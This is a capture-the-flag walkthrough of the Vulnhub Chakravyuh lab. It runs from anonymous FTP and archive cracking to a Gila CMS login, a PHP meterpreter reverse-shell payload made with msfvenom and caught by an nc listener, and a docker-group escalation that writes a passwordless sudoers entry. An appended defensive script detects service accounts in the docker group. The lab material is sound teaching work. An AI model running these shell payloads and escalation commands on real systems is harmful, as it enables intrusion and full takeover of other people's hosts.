Vulnhub Chakravyuh Walkthrough

We start by scanning the host: nmap -A -T4 -p- 192.168.1.3 -vv

Running dirb

There is an FTP service on port 65530 which allows login using the anonymous username

The file we’ve downloaded is password protected

We need to download a Python script called 7z2john.py to extract the hash from the file so we can crack it with John

python 7z2john.py arjun.7z > hash.txt

The password is family, let’s open the file.

The file contains a string that looks like Base64; we can decode it using base64

gila:admin@gmail.com:princesa

gila is a directory name: 192.168.1.3/gila

Running dirb gave us http://192.168.1.3/gila/admin/. Now we log in with the email admin@gmail.com and the password princesa.

After we log in, there is a File Manager where we can upload a PHP shell. Upload it to the tmp folder

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -f raw -o shell.php

Now visit http://192.168.1.3/gila/tmp/shell.php. Also make sure to start Metasploit and start a session, or just open a listening port using nc -lvp 4444

Reading the group file, we can see that we are in the docker group. Members of that group can start containers that run as root and mount the host filesystem, so we can escalate from there.

Just run the following commands:

docker run --privileged --interactive --tty --volume /:/host bash

echo "www-data ALL=(ALL) NOPASSWD: ALL" > /host/etc/sudoers.d/foo

Now just read the final.txt
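
A defender-side check for the condition used in the escalation above, as an added example that is not part of the original walkthrough: it lists service accounts that belong to the docker group, either by being named on the group line or through their primary GID. The sample files, the alice and builder accounts, and the UID cutoff of 1000 are constructed assumptions.

```bash
# Added example (not from the walkthrough): find service accounts in the docker group.
# docker_group_members GROUP_FILE PASSWD_FILE
# Prints "<user> <uid> <how>"; how is "supplementary" (named on the docker
# line of the group file) or "primary" (passwd GID equals the docker GID).
docker_group_members() {
    local group_file="$1" passwd_file="$2"
    awk -F: -v gf="$group_file" '
        FILENAME == gf {                      # first file: group database
            if ($1 == "docker") {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) if (m[i] != "") supp[m[i]] = 1
            }
            next
        }
        $1 in supp                { print $1, $3, "supplementary"; next }
        gid != "" && $4 == gid    { print $1, $3, "primary" }
    ' "$group_file" "$passwd_file"
}

# service_accounts_in_docker GROUP_FILE PASSWD_FILE [MIN_HUMAN_UID]
# Keeps non-root accounts below the human UID range (assumed cutoff: 1000).
service_accounts_in_docker() {
    docker_group_members "$1" "$2" |
        awk -v min="${3:-1000}" '$2 != 0 && $2 < min { print $1 }'
}

# Constructed sample files; on a real host pass /etc/group and /etc/passwd.
sample_dir=$(mktemp -d)
cat > "$sample_dir/group" <<'EOF'
root:x:0:
www-data:x:33:
docker:x:998:www-data,alice
EOF
cat > "$sample_dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
builder:x:112:998::/var/lib/builder:/bin/sh
EOF
service_accounts_in_docker "$sample_dir/group" "$sample_dir/passwd"
```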
